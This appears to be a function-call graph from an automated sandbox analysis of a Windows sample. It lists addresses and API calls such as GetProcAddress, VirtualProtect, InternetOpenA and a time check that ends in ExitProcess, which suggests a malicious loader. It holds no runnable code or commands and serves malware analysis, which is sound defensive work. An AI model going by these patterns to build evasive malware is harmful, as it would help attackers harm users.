13612 926a43 13611->13612 13613 92a9b0 13612->13613 13834 92a710 13613->13834 13615 92a9c1 lstrlen 13617 92a9e0 13615->13617 13616 92aa18 13835 92a7a0 13616->13835 13617->13616 13619 92a9fa lstrcpy lstrcat 13617->13619 13619->13616 13620 92aa24 13620->13448 13622 92a8bb 13621->13622 13623 92a90b 13622->13623 13624 92a8f9 lstrcpy 13622->13624 13623->13458 13624->13623 13839 926820 13625->13839 13627 92698e 13628 926998 sscanf 13627->13628 13868 92a800 13628->13868 13630 9269aa SystemTimeToFileTime SystemTimeToFileTime 13631 9269e0 13630->13631 13632 9269ce 13630->13632 13634 925b10 13631->13634 13632->13631 13633 9269d8 ExitProcess 13632->13633 13635 925b1d 13634->13635 13636 92a740 lstrcpy 13635->13636 13637 925b2e 13636->13637 13870 92a820 lstrlen 13637->13870 13640 92a820 2 API calls 13641 925b64 13640->13641 13642 92a820 2 API calls 13641->13642 13643 925b74 13642->13643 13874 926430 13643->13874 13646 92a820 2 API calls 13647 925b93 13646->13647 13648 92a820 2 API calls 13647->13648 13649 925ba0 13648->13649 13650 92a820 2 API calls 13649->13650 13651 925bad 13650->13651 13652 92a820 2 API calls 13651->13652 13653 925bf9 13652->13653 13883 9126a0 13653->13883 13661 925cc3 13662 926430 lstrcpy 13661->13662 13663 925cd5 13662->13663 13664 92a7a0 lstrcpy 13663->13664 13665 925cf2 13664->13665 13666 92a9b0 4 API calls 13665->13666 13667 925d0a 13666->13667 13668 92a8a0 lstrcpy 13667->13668 13669 925d16 13668->13669 13670 92a9b0 4 API calls 13669->13670 13671 925d3a 13670->13671 13672 92a8a0 lstrcpy 13671->13672 13673 925d46 13672->13673 13674 92a9b0 4 API calls 13673->13674 13675 925d6a 13674->13675 13676 92a8a0 lstrcpy 13675->13676 13677 925d76 13676->13677 13678 92a740 lstrcpy 13677->13678 13679 925d9e 13678->13679 14609 927500 GetWindowsDirectoryA 13679->14609 13682 92a7a0 lstrcpy 13683 925db8 13682->13683 14619 914880 13683->14619 13685 925dbe 14764 9217a0 13685->14764 13687 925dc6 13688 92a740 lstrcpy 13687->13688 13689 925de9 13688->13689 13690 911590 lstrcpy 13689->13690 13691 925dfd 13690->13691 14780 915960 13691->14780 13693 925e03 14924 921050 13693->14924 13695 925e0e 13696 92a740 lstrcpy 13695->13696 13697 925e32 13696->13697 13698 911590 lstrcpy 13697->13698 13699 925e46 13698->13699 13700 915960 34 API calls 13699->13700 13701 925e4c 13700->13701 14928 920d90 13701->14928 13703 925e57 13704 92a740 lstrcpy 13703->13704 13705 925e79 13704->13705 13706 911590 lstrcpy 13705->13706 13707 925e8d 13706->13707 13708 915960 34 API calls 13707->13708 13709 925e93 13708->13709 14935 920f40 13709->14935 13711 925e9e 13712 911590 lstrcpy 13711->13712 13713 925eb5 13712->13713 14940 921a10 13713->14940 13715 925eba 13716 92a740 lstrcpy 13715->13716 13717 925ed6 13716->13717 15284 914fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13717->15284 13719 925edb 13720 911590 lstrcpy 13719->13720 13721 925f5b 13720->13721 15291 920740 13721->15291 13723 925f60 13724 92a740 lstrcpy 13723->13724 13725 925f86 13724->13725 13726 911590 lstrcpy 13725->13726 13727 925f9a 13726->13727 13728 915960 34 API calls 13727->13728 13729 925fa0 13728->13729 15344 921170 13729->15344 13823 9145d1 RtlAllocateHeap 13822->13823 13826 914621 VirtualProtect 13823->13826 13826->13471 13827->13558 13830 9110c2 codecvt 13828->13830 13829 9110fd 13829->13588 13830->13829 13831 9110e2 VirtualFree 13830->13831 13831->13829 13833 911233 GlobalMemoryStatusEx 13832->13833 13833->13591 13834->13615 13836 92a7c2 13835->13836 13837 92a7ec 13836->13837 13838 92a7da lstrcpy 13836->13838 13837->13620 13838->13837 13840 92a740 lstrcpy 13839->13840 13841 926833 13840->13841 13842 92a9b0 4 API calls 13841->13842 13843 926845 13842->13843 13844 92a8a0 lstrcpy 13843->13844 13845 92684e 13844->13845 13846 92a9b0 4 API calls 13845->13846 13847 926867 13846->13847 13848 92a8a0 lstrcpy 13847->13848 13849 926870 13848->13849 13850 92a9b0 4 API calls 13849->13850 13851 92688a 13850->13851 13852 92a8a0 lstrcpy 13851->13852 13853 926893 13852->13853 13854 92a9b0 4 API calls 13853->13854 13855 9268ac 13854->13855 13856 92a8a0 lstrcpy 13855->13856 13857 9268b5 13856->13857 13858 92a9b0 4 API calls 13857->13858 13859 9268cf 13858->13859 13860 92a8a0 lstrcpy 13859->13860 13861 9268d8 13860->13861 13862 92a9b0 4 API calls 13861->13862 13863 9268f3 13862->13863 13864 92a8a0 lstrcpy 13863->13864 13865 9268fc 13864->13865 13866 92a7a0 lstrcpy 13865->13866 13867 926910 13866->13867 13867->13627 13869 92a812 13868->13869 13869->13630 13871 92a83f 13870->13871 13872 925b54 13871->13872 13873 92a87b lstrcpy 13871->13873 13872->13640 13873->13872 13875 92a8a0 lstrcpy 13874->13875 13876 926443 13875->13876 13877 92a8a0 lstrcpy 13876->13877 13878 926455 13877->13878 13879 92a8a0 lstrcpy 13878->13879 13880 926467 13879->13880 13881 92a8a0 lstrcpy 13880->13881 13882 925b86 13881->13882 13882->13646 13884 9145c0 2 API calls 13883->13884 13885 9126b4 13884->13885 13886 9145c0 2 API calls 13885->13886 13887 9126d7 13886->13887 13888 9145c0 2 API calls 13887->13888 13889 9126f0 13888->13889 13890 9145c0 2 API calls 13889->13890 13891 912709 13890->13891 13892 9145c0 2 API calls 13891->13892 13893 912736 13892->13893 13894 9145c0 2 API calls 13893->13894 13895 91274f 13894->13895 13896 9145c0 2 API calls 13895->13896 13897 912768 13896->13897 13898 9145c0 2 API calls 13897->13898 13899 912795 13898->13899 13900 9145c0 2 API calls 13899->13900 13901 9127ae 13900->13901 13902 9145c0 2 API calls 13901->13902 13903 9127c7 13902->13903 13904 9145c0 2 API calls 13903->13904 13905 9127e0 13904->13905 13906 9145c0 2 API calls 13905->13906 13907 9127f9 13906->13907 13908 9145c0 2 API calls 13907->13908 13909 912812 13908->13909 13910 9145c0 2 API calls 13909->13910 13911 91282b 13910->13911 13912 9145c0 2 API calls 13911->13912 13913 912844 13912->13913 13914 9145c0 2 API calls 13913->13914 13915 91285d 13914->13915 13916 9145c0 2 API calls 13915->13916 13917 912876 13916->13917 13918 9145c0 2 API calls 13917->13918 13919 91288f 13918->13919 13920 9145c0 2 API calls 13919->13920 13921 9128a8 13920->13921 13922 9145c0 2 API calls 13921->13922 13923 9128c1 13922->13923 13924 9145c0 2 API calls 13923->13924 13925 9128da 13924->13925 13926 9145c0 2 API calls 13925->13926 13927 9128f3 13926->13927 13928 9145c0 2 API calls 13927->13928 13929 91290c 13928->13929 13930 9145c0 2 API calls 13929->13930 13931 912925 13930->13931 13932 9145c0 2 API calls 13931->13932 13933 91293e 13932->13933 13934 9145c0 2 API calls 13933->13934 13935 912957 13934->13935 13936 9145c0 2 API calls 13935->13936 13937 912970 13936->13937 13938 9145c0 2 API calls 13937->13938 13939 912989 13938->13939 13940 9145c0 2 API calls 13939->13940 13941 9129a2 13940->13941 13942 9145c0 2 API calls 13941->13942 13943 9129bb 13942->13943 13944 9145c0 2 API calls 13943->13944 13945 9129d4 13944->13945 13946 9145c0 2 API calls 13945->13946 13947 9129ed 13946->13947 13948 9145c0 2 API calls 13947->13948 13949 912a06 13948->13949 13950 9145c0 2 API calls 13949->13950 13951 912a1f 13950->13951 13952 9145c0 2 API calls 13951->13952 13953 912a38 13952->13953 13954 9145c0 2 API calls 13953->13954 13955 912a51 13954->13955 13956 9145c0 2 API calls 13955->13956 13957 912a6a 13956->13957 13958 9145c0 2 API calls 13957->13958 13959 912a83 13958->13959 13960 9145c0 2 API calls 13959->13960 13961 912a9c 13960->13961 13962 9145c0 2 API calls 13961->13962 13963 912ab5 13962->13963 13964 9145c0 2 API calls 13963->13964 13965 912ace 13964->13965 13966 9145c0 2 API calls 13965->13966 13967 912ae7 13966->13967 13968 9145c0 2 API calls 13967->13968 13969 912b00 13968->13969 13970 9145c0 2 API calls 13969->13970 13971 912b19 13970->13971 13972 9145c0 2 API calls 13971->13972 13973 912b32 13972->13973 13974 9145c0 2 API calls 13973->13974 13975 912b4b 13974->13975 13976 9145c0 2 API calls 13975->13976 13977 912b64 13976->13977 13978 9145c0 2 API calls 13977->13978 13979 912b7d 13978->13979 13980 9145c0 2 API calls 13979->13980 13981 912b96 13980->13981 13982 9145c0 2 API calls 13981->13982 13983 912baf 13982->13983 13984 9145c0 2 API calls 13983->13984 13985 912bc8 13984->13985 13986 9145c0 2 API calls 13985->13986 13987 912be1 13986->13987 13988 9145c0 2 API calls 13987->13988 13989 912bfa 13988->13989 13990 9145c0 2 API calls 13989->13990 13991 912c13 13990->13991 13992 9145c0 2 API calls 13991->13992 13993 912c2c 13992->13993 13994 9145c0 2 API calls 13993->13994 13995 912c45 13994->13995 13996 9145c0 2 API calls 13995->13996 13997 912c5e 13996->13997 13998 9145c0 2 API calls 13997->13998 13999 912c77 13998->13999 14000 9145c0 2 API calls 13999->14000 14001 912c90 14000->14001 14002 9145c0 2 API calls 14001->14002 14003 912ca9 14002->14003 14004 9145c0 2 API calls 14003->14004 14005 912cc2 14004->14005 14006 9145c0 2 API calls 14005->14006 14007 912cdb 14006->14007 14008 9145c0 2 API calls 14007->14008 14009 912cf4 14008->14009 14010 9145c0 2 API calls 14009->14010 14011 912d0d 14010->14011 14012 9145c0 2 API calls 14011->14012 14013 912d26 14012->14013 14014 9145c0 2 API calls 14013->14014 14015 912d3f 14014->14015 14016 9145c0 2 API calls 14015->14016 14017 912d58 14016->14017 14018 9145c0 2 API calls 14017->14018 14019 912d71 14018->14019 14020 9145c0 2 API calls 14019->14020 14021 912d8a 14020->14021 14022 9145c0 2 API calls 14021->14022 14023 912da3 14022->14023 14024 9145c0 2 API calls 14023->14024 14025 912dbc 14024->14025 14026 9145c0 2 API calls 14025->14026 14027 912dd5 14026->14027 14028 9145c0 2 API calls 14027->14028 14029 912dee 14028->14029 14030 9145c0 2 API calls 14029->14030 14031 912e07 14030->14031 14032 9145c0 2 API calls 14031->14032 14033 912e20 14032->14033 14034 9145c0 2 API calls 14033->14034 14035 912e39 14034->14035 14036 9145c0 2 API calls 14035->14036 14037 912e52 14036->14037 14038 9145c0 2 API calls 14037->14038 14039 912e6b 14038->14039 14040 9145c0 2 API calls 14039->14040 14041 912e84 14040->14041 14042 9145c0 2 API calls 14041->14042 14043 912e9d 14042->14043 14044 9145c0 2 API calls 14043->14044 14045 912eb6 14044->14045 14046 9145c0 2 API calls 14045->14046 14047 912ecf 14046->14047 14048 9145c0 2 API calls 14047->14048 14049 912ee8 14048->14049 14050 9145c0 2 API calls 14049->14050 14051 912f01 14050->14051 14052 9145c0 2 API calls 14051->14052 14053 912f1a 14052->14053 14054 9145c0 2 API calls 14053->14054 14055 912f33 14054->14055 14056 9145c0 2 API calls 14055->14056 14057 912f4c 14056->14057 14058 9145c0 2 API calls 14057->14058 14059 912f65 14058->14059 14060 9145c0 2 API calls 14059->14060 14061 912f7e 14060->14061 14062 9145c0 2 API calls 14061->14062 14063 912f97 14062->14063 14064 9145c0 2 API calls 14063->14064 14065 912fb0 14064->14065 14066 9145c0 2 API calls 14065->14066 14067 912fc9 14066->14067 14068 9145c0 2 API calls 14067->14068 14069 912fe2 14068->14069 14070 9145c0 2 API calls 14069->14070 14071 912ffb 14070->14071 14072 9145c0 2 API calls 14071->14072 14073 913014 14072->14073 14074 9145c0 2 API calls 14073->14074 14075 91302d 14074->14075 14076 9145c0 2 API calls 14075->14076 14077 913046 14076->14077 14078 9145c0 2 API calls 14077->14078 14079 91305f 14078->14079 14080 9145c0 2 API calls 14079->14080 14081 913078 14080->14081 14082 9145c0 2 API calls 14081->14082 14083 913091 14082->14083 14084 9145c0 2 API calls 14083->14084 14085 9130aa 14084->14085 14086 9145c0 2 API calls 14085->14086 14087 9130c3 14086->14087 14088 9145c0 2 API calls 14087->14088 14089 9130dc 14088->14089 14090 9145c0 2 API calls 14089->14090 14091 9130f5 14090->14091 14092 9145c0 2 API calls 14091->14092 14093 91310e 14092->14093 14094 9145c0 2 API calls 14093->14094 14095 913127 14094->14095 14096 9145c0 2 API calls 14095->14096 14097 913140 14096->14097 14098 9145c0 2 API calls 14097->14098 14099 913159 14098->14099 14100 9145c0 2 API calls 14099->14100 14101 913172 14100->14101 14102 9145c0 2 API calls 14101->14102 14103 91318b 14102->14103 14104 9145c0 2 API calls 14103->14104 14105 9131a4 14104->14105 14106 9145c0 2 API calls 14105->14106 14107 9131bd 14106->14107 14108 9145c0 2 API calls 14107->14108 14109 9131d6 14108->14109 14110 9145c0 2 API calls 14109->14110 14111 9131ef 14110->14111 14112 9145c0 2 API calls 14111->14112 14113 913208 14112->14113 14114 9145c0 2 API calls 14113->14114 14115 913221 14114->14115 14116 9145c0 2 API calls 14115->14116 14117 91323a 14116->14117 14118 9145c0 2 API calls 14117->14118 14119 913253 14118->14119 14120 9145c0 2 API calls 14119->14120 14121 91326c 14120->14121 14122 9145c0 2 API calls 14121->14122 14123 913285 14122->14123 14124 9145c0 2 API calls 14123->14124 14125 91329e 14124->14125 14126 9145c0 2 API calls 14125->14126 14127 9132b7 14126->14127 14128 9145c0 2 API calls 14127->14128 14129 9132d0 14128->14129 14130 9145c0 2 API calls 14129->14130 14131 9132e9 14130->14131 14132 9145c0 2 API calls 14131->14132 14133 913302 14132->14133 14134 9145c0 2 API calls 14133->14134 14135 91331b 14134->14135 14136 9145c0 2 API calls 14135->14136 14137 913334 14136->14137 14138 9145c0 2 API calls 14137->14138 14139 91334d 14138->14139 14140 9145c0 2 API calls 14139->14140 14141 913366 14140->14141 14142 9145c0 2 API calls 14141->14142 14143 91337f 14142->14143 14144 9145c0 2 API calls 14143->14144 14145 913398 14144->14145 14146 9145c0 2 API calls 14145->14146 14147 9133b1 14146->14147 14148 9145c0 2 API calls 14147->14148 14149 9133ca 14148->14149 14150 9145c0 2 API calls 14149->14150 14151 9133e3 14150->14151 14152 9145c0 2 API calls 14151->14152 14153 9133fc 14152->14153 14154 9145c0 2 API calls 14153->14154 14155 913415 14154->14155 14156 9145c0 2 API calls 14155->14156 14157 91342e 14156->14157 14158 9145c0 2 API calls 14157->14158 14159 913447 14158->14159 14160 9145c0 2 API calls 14159->14160 14161 913460 14160->14161 14162 9145c0 2 API calls 14161->14162 14163 913479 14162->14163 14164 9145c0 2 API calls 14163->14164 14165 913492 14164->14165 14166 9145c0 2 API calls 14165->14166 14167 9134ab 14166->14167 14168 9145c0 2 API calls 14167->14168 14169 9134c4 14168->14169 14170 9145c0 2 API calls 14169->14170 14171 9134dd 14170->14171 14172 9145c0 2 API calls 14171->14172 14173 9134f6 14172->14173 14174 9145c0 2 API calls 14173->14174 14175 91350f 14174->14175 14176 9145c0 2 API calls 14175->14176 14177 913528 14176->14177 14178 9145c0 2 API calls 14177->14178 14179 913541 14178->14179 14180 9145c0 2 API calls 14179->14180 14181 91355a 14180->14181 14182 9145c0 2 API calls 14181->14182 14183 913573 14182->14183 14184 9145c0 2 API calls 14183->14184 14185 91358c 14184->14185 14186 9145c0 2 API calls 14185->14186 14187 9135a5 14186->14187 14188 9145c0 2 API calls 14187->14188 14189 9135be 14188->14189 14190 9145c0 2 API calls 14189->14190 14191 9135d7 14190->14191 14192 9145c0 2 API calls 14191->14192 14193 9135f0 14192->14193 14194 9145c0 2 API calls 14193->14194 14195 913609 14194->14195 14196 9145c0 2 API calls 14195->14196 14197 913622 14196->14197 14198 9145c0 2 API calls 14197->14198 14199 91363b 14198->14199 14200 9145c0 2 API calls 14199->14200 14201 913654 14200->14201 14202 9145c0 2 API calls 14201->14202 14203 91366d 14202->14203 14204 9145c0 2 API calls 14203->14204 14205 913686 14204->14205 14206 9145c0 2 API calls 14205->14206 14207 91369f 14206->14207 14208 9145c0 2 API calls 14207->14208 14209 9136b8 14208->14209 14210 9145c0 2 API calls 14209->14210 14211 9136d1 14210->14211 14212 9145c0 2 API calls 14211->14212 14213 9136ea 14212->14213 14214 9145c0 2 API calls 14213->14214 14215 913703 14214->14215 14216 9145c0 2 API calls 14215->14216 14217 91371c 14216->14217 14218 9145c0 2 API calls 14217->14218 14219 913735 14218->14219 14220 9145c0 2 API calls 14219->14220 14221 91374e 14220->14221 14222 9145c0 2 API calls 14221->14222 14223 913767 14222->14223 14224 9145c0 2 API calls 14223->14224 14225 913780 14224->14225 14226 9145c0 2 API calls 14225->14226 14227 913799 14226->14227 14228 9145c0 2 API calls 14227->14228 14229 9137b2 14228->14229 14230 9145c0 2 API calls 14229->14230 14231 9137cb 14230->14231 14232 9145c0 2 API calls 14231->14232 14233 9137e4 14232->14233 14234 9145c0 2 API calls 14233->14234 14235 9137fd 14234->14235 14236 9145c0 2 API calls 14235->14236 14237 913816 14236->14237 14238 9145c0 2 API calls 14237->14238 14239 91382f 14238->14239 14240 9145c0 2 API calls 14239->14240 14241 913848 14240->14241 14242 9145c0 2 API calls 14241->14242 14243 913861 14242->14243 14244 9145c0 2 API calls 14243->14244 14245 91387a 14244->14245 14246 9145c0 2 API calls 14245->14246 14247 913893 14246->14247 14248 9145c0 2 API calls 14247->14248 14249 9138ac 14248->14249 14250 9145c0 2 API calls 14249->14250 14251 9138c5 14250->14251 14252 9145c0 2 API calls 14251->14252 14253 9138de 14252->14253 14254 9145c0 2 API calls 14253->14254 14255 9138f7 14254->14255 14256 9145c0 2 API calls 14255->14256 14257 913910 14256->14257 14258 9145c0 2 API calls 14257->14258 14259 913929 14258->14259 14260 9145c0 2 API calls 14259->14260 14261 913942 14260->14261 14262 9145c0 2 API calls 14261->14262 14263 91395b 14262->14263 14264 9145c0 2 API calls 14263->14264 14265 913974 14264->14265 14266 9145c0 2 API calls 14265->14266 14267 91398d 14266->14267 14268 9145c0 2 API calls 14267->14268 14269 9139a6 14268->14269 14270 9145c0 2 API calls 14269->14270 14271 9139bf 14270->14271 14272 9145c0 2 API calls 14271->14272 14273 9139d8 14272->14273 14274 9145c0 2 API calls 14273->14274 14275 9139f1 14274->14275 14276 9145c0 2 API calls 14275->14276 14277 913a0a 14276->14277 14278 9145c0 2 API calls 14277->14278 14279 913a23 14278->14279 14280 9145c0 2 API calls 14279->14280 14281 913a3c 14280->14281 14282 9145c0 2 API calls 14281->14282 14283 913a55 14282->14283 14284 9145c0 2 API calls 14283->14284 14285 913a6e 14284->14285 14286 9145c0 2 API calls 14285->14286 14287 913a87 14286->14287 14288 9145c0 2 API calls 14287->14288 14289 913aa0 14288->14289 14290 9145c0 2 API calls 14289->14290 14291 913ab9 14290->14291 14292 9145c0 2 API calls 14291->14292 14293 913ad2 14292->14293 14294 9145c0 2 API calls 14293->14294 14295 913aeb 14294->14295 14296 9145c0 2 API calls 14295->14296 14297 913b04 14296->14297 14298 9145c0 2 API calls 14297->14298 14299 913b1d 14298->14299 14300 9145c0 2 API calls 14299->14300 14301 913b36 14300->14301 14302 9145c0 2 API calls 14301->14302 14303 913b4f 14302->14303 14304 9145c0 2 API calls 14303->14304 14305 913b68 14304->14305 14306 9145c0 2 API calls 14305->14306 14307 913b81 14306->14307 14308 9145c0 2 API calls 14307->14308 14309 913b9a 14308->14309 14310 9145c0 2 API calls 14309->14310 14311 913bb3 14310->14311 14312 9145c0 2 API calls 14311->14312 14313 913bcc 14312->14313 14314 9145c0 2 API calls 14313->14314 14315 913be5 14314->14315 14316 9145c0 2 API calls 14315->14316 14317 913bfe 14316->14317 14318 9145c0 2 API calls 14317->14318 14319 913c17 14318->14319 14320 9145c0 2 API calls 14319->14320 14321 913c30 14320->14321 14322 9145c0 2 API calls 14321->14322 14323 913c49 14322->14323 14324 9145c0 2 API calls 14323->14324 14325 913c62 14324->14325 14326 9145c0 2 API calls 14325->14326 14327 913c7b 14326->14327 14328 9145c0 2 API calls 14327->14328 14329 913c94 14328->14329 14330 9145c0 2 API calls 14329->14330 14331 913cad 14330->14331 14332 9145c0 2 API calls 14331->14332 14333 913cc6 14332->14333 14334 9145c0 2 API calls 14333->14334 14335 913cdf 14334->14335 14336 9145c0 2 API calls 14335->14336 14337 913cf8 14336->14337 14338 9145c0 2 API calls 14337->14338 14339 913d11 14338->14339 14340 9145c0 2 API calls 14339->14340 14341 913d2a 14340->14341 14342 9145c0 2 API calls 14341->14342 14343 913d43 14342->14343 14344 9145c0 2 API calls 14343->14344 14345 913d5c 14344->14345 14346 9145c0 2 API calls 14345->14346 14347 913d75 14346->14347 14348 9145c0 2 API calls 14347->14348 14349 913d8e 14348->14349 14350 9145c0 2 API calls 14349->14350 14351 913da7 14350->14351 14352 9145c0 2 API calls 14351->14352 14353 913dc0 14352->14353 14354 9145c0 2 API calls 14353->14354 14355 913dd9 14354->14355 14356 9145c0 2 API calls 14355->14356 14357 913df2 14356->14357 14358 9145c0 2 API calls 14357->14358 14359 913e0b 14358->14359 14360 9145c0 2 API calls 14359->14360 14361 913e24 14360->14361 14362 9145c0 2 API calls 14361->14362 14363 913e3d 14362->14363 14364 9145c0 2 API calls 14363->14364 14365 913e56 14364->14365 14366 9145c0 2 API calls 14365->14366 14367 913e6f 14366->14367 14368 9145c0 2 API calls 14367->14368 14369 913e88 14368->14369 14370 9145c0 2 API calls 14369->14370 14371 913ea1 14370->14371 14372 9145c0 2 API calls 14371->14372 14373 913eba 14372->14373 14374 9145c0 2 API calls 14373->14374 14375 913ed3 14374->14375 14376 9145c0 2 API calls 14375->14376 14377 913eec 14376->14377 14378 9145c0 2 API calls 14377->14378 14379 913f05 14378->14379 14380 9145c0 2 API calls 14379->14380 14381 913f1e 14380->14381 14382 9145c0 2 API calls 14381->14382 14383 913f37 14382->14383 14384 9145c0 2 API calls 14383->14384 14385 913f50 14384->14385 14386 9145c0 2 API calls 14385->14386 14387 913f69 14386->14387 14388 9145c0 2 API calls 14387->14388 14389 913f82 14388->14389 14390 9145c0 2 API calls 14389->14390 14391 913f9b 14390->14391 14392 9145c0 2 API calls 14391->14392 14393 913fb4 14392->14393 14394 9145c0 2 API calls 14393->14394 14395 913fcd 14394->14395 14396 9145c0 2 API calls 14395->14396 14397 913fe6 14396->14397 14398 9145c0 2 API calls 14397->14398 14399 913fff 14398->14399 14400 9145c0 2 API calls 14399->14400 14401 914018 14400->14401 14402 9145c0 2 API calls 14401->14402 14403 914031 14402->14403 14404 9145c0 2 API calls 14403->14404 14405 91404a 14404->14405 14406 9145c0 2 API calls 14405->14406 14407 914063 14406->14407 14408 9145c0 2 API calls 14407->14408 14409 91407c 14408->14409 14410 9145c0 2 API calls 14409->14410 14411 914095 14410->14411 14412 9145c0 2 API calls 14411->14412 14413 9140ae 14412->14413 14414 9145c0 2 API calls 14413->14414 14415 9140c7 14414->14415 14416 9145c0 2 API calls 14415->14416 14417 9140e0 14416->14417 14418 9145c0 2 API calls 14417->14418 14419 9140f9 14418->14419 14420 9145c0 2 API calls 14419->14420 14421 914112 14420->14421 14422 9145c0 2 API calls 14421->14422 14423 91412b 14422->14423 14424 9145c0 2 API calls 14423->14424 14425 914144 14424->14425 14426 9145c0 2 API calls 14425->14426 14427 91415d 14426->14427 14428 9145c0 2 API calls 14427->14428 14429 914176 14428->14429 14430 9145c0 2 API calls 14429->14430 14431 91418f 14430->14431 14432 9145c0 2 API calls 14431->14432 14433 9141a8 14432->14433 14434 9145c0 2 API calls 14433->14434 14435 9141c1 14434->14435 14436 9145c0 2 API calls 14435->14436 14437 9141da 14436->14437 14438 9145c0 2 API calls 14437->14438 14439 9141f3 14438->14439 14440 9145c0 2 API calls 14439->14440 14441 91420c 14440->14441 14442 9145c0 2 API calls 14441->14442 14443 914225 14442->14443 14444 9145c0 2 API calls 14443->14444 14445 91423e 14444->14445 14446 9145c0 2 API calls 14445->14446 14447 914257 14446->14447 14448 9145c0 2 API calls 14447->14448 14449 914270 14448->14449 14450 9145c0 2 API calls 14449->14450 14451 914289 14450->14451 14452 9145c0 2 API calls 14451->14452 14453 9142a2 14452->14453 14454 9145c0 2 API calls 14453->14454 14455 9142bb 14454->14455 14456 9145c0 2 API calls 14455->14456 14457 9142d4 14456->14457 14458 9145c0 2 API calls 14457->14458 14459 9142ed 14458->14459 14460 9145c0 2 API calls 14459->14460 14461 914306 14460->14461 14462 9145c0 2 API calls 14461->14462 14463 91431f 14462->14463 14464 9145c0 2 API calls 14463->14464 14465 914338 14464->14465 14466 9145c0 2 API calls 14465->14466 14467 914351 14466->14467 14468 9145c0 2 API calls 14467->14468 14469 91436a 14468->14469 14470 9145c0 2 API calls 14469->14470 14471 914383 14470->14471 14472 9145c0 2 API calls 14471->14472 14473 91439c 14472->14473 14474 9145c0 2 API calls 14473->14474 14475 9143b5 14474->14475 14476 9145c0 2 API calls 14475->14476 14477 9143ce 14476->14477 14478 9145c0 2 API calls 14477->14478 14479 9143e7 14478->14479 14480 9145c0 2 API calls 14479->14480 14481 914400 14480->14481 14482 9145c0 2 API calls 14481->14482 14483 914419 14482->14483 14484 9145c0 2 API calls 14483->14484 14485 914432 14484->14485 14486 9145c0 2 API calls 14485->14486 14487 91444b 14486->14487 14488 9145c0 2 API calls 14487->14488 14489 914464 14488->14489 14490 9145c0 2 API calls 14489->14490 14491 91447d 14490->14491 14492 9145c0 2 API calls 14491->14492 14493 914496 14492->14493 14494 9145c0 2 API calls 14493->14494 14495 9144af 14494->14495 14496 9145c0 2 API calls 14495->14496 14497 9144c8 14496->14497 14498 9145c0 2 API calls 14497->14498 14499 9144e1 14498->14499 14500 9145c0 2 API calls 14499->14500 14501 9144fa 14500->14501 14502 9145c0 2 API calls 14501->14502 14503 914513 14502->14503 14504 9145c0 2 API calls 14503->14504 14505 91452c 14504->14505 14506 9145c0 2 API calls 14505->14506 14507 914545 14506->14507 14508 9145c0 2 API calls 14507->14508 14509 91455e 14508->14509 14510 9145c0 2 API calls 14509->14510 14511 914577 14510->14511 14512 9145c0 2 API calls 14511->14512 14513 914590 14512->14513 14514 9145c0 2 API calls 14513->14514 14515 9145a9 14514->14515 14516 929c10 14515->14516 14517 929c20 43 API calls 14516->14517 14518 92a036 8 API calls 14516->14518 14517->14518 14519 92a146 14518->14519 14520 92a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14518->14520 14521 92a153 8 API calls 14519->14521 14522 92a216 14519->14522 14520->14519 14521->14522 14523 92a298 14522->14523 14524 92a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14522->14524 14525 92a337 14523->14525 14526 92a2a5 6 API calls 14523->14526 14524->14523 14527 92a344 9 API calls 14525->14527 14528 92a41f 14525->14528 14526->14525 14527->14528 14529 92a4a2 14528->14529 14530 92a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14528->14530 14531 92a4ab GetProcAddress GetProcAddress 14529->14531 14532 92a4dc 14529->14532 14530->14529 14531->14532 14533 92a515 14532->14533 14534 92a4e5 GetProcAddress GetProcAddress 14532->14534 14535 92a612 14533->14535 14536 92a522 10 API calls 14533->14536 14534->14533 14537 92a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14535->14537 14538 92a67d 14535->14538 14536->14535 14537->14538 14539 92a686 GetProcAddress 14538->14539 14540 92a69e 14538->14540 14539->14540 14541 92a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14540->14541 14542 925ca3 14540->14542 14541->14542 14543 911590 14542->14543 15664 911670 14543->15664 14546 92a7a0 lstrcpy 14547 9115b5 14546->14547 14548 92a7a0 lstrcpy 14547->14548 14549 9115c7 14548->14549 14550 92a7a0 lstrcpy 14549->14550 14551 9115d9 14550->14551 14552 92a7a0 lstrcpy 14551->14552 14553 911663 14552->14553 14554 925510 14553->14554 14555 925521 14554->14555 14556 92a820 2 API calls 14555->14556 14557 92552e 14556->14557 14558 92a820 2 API calls 14557->14558 14559 92553b 14558->14559 14560 92a820 2 API calls 14559->14560 14561 925548 14560->14561 14562 92a740 lstrcpy 14561->14562 14563 925555 14562->14563 14564 92a740 lstrcpy 14563->14564 14565 925562 14564->14565 14566 92a740 lstrcpy 14565->14566 14567 92556f 14566->14567 14568 92a740 lstrcpy 14567->14568 14601 92557c 14568->14601 14569 925643 StrCmpCA 14569->14601 14570 9256a0 StrCmpCA 14571 9257dc 14570->14571 14570->14601 14572 92a8a0 lstrcpy 14571->14572 14573 9257e8 14572->14573 14574 92a820 2 API calls 14573->14574 14576 9257f6 14574->14576 14575 92a820 lstrlen lstrcpy 14575->14601 14578 92a820 2 API calls 14576->14578 14577 925856 StrCmpCA 14579 925991 14577->14579 14577->14601 14583 925805 14578->14583 14582 92a8a0 lstrcpy 14579->14582 14580 92a740 lstrcpy 14580->14601 14581 92a7a0 lstrcpy 14581->14601 14584 92599d 14582->14584 14585 911670 lstrcpy 14583->14585 14587 92a820 2 API calls 14584->14587 14597 925811 14585->14597 14586 911590 lstrcpy 14586->14601 14588 9259ab 14587->14588 14592 92a820 2 API calls 14588->14592 14589 925a0b StrCmpCA 14593 925a16 Sleep 14589->14593 14594 925a28 14589->14594 14590 9252c0 25 API calls 14590->14601 14591 9251f0 20 API calls 14591->14601 14595 9259ba 14592->14595 14593->14601 14596 92a8a0 lstrcpy 14594->14596 14599 911670 lstrcpy 14595->14599 14600 925a34 14596->14600 14597->13661 14598 92a8a0 lstrcpy 14598->14601 14599->14597 14602 92a820 2 API calls 14600->14602 14601->14569 14601->14570 14601->14575 14601->14577 14601->14580 14601->14581 14601->14586 14601->14589 14601->14590 14601->14591 14601->14598 14605 92578a StrCmpCA 14601->14605 14608 92593f StrCmpCA 14601->14608 14603 925a43 14602->14603 14604 92a820 2 API calls 14603->14604 14606 925a52 14604->14606 14605->14601 14607 911670 lstrcpy 14606->14607 14607->14597 14608->14601 14610 927553 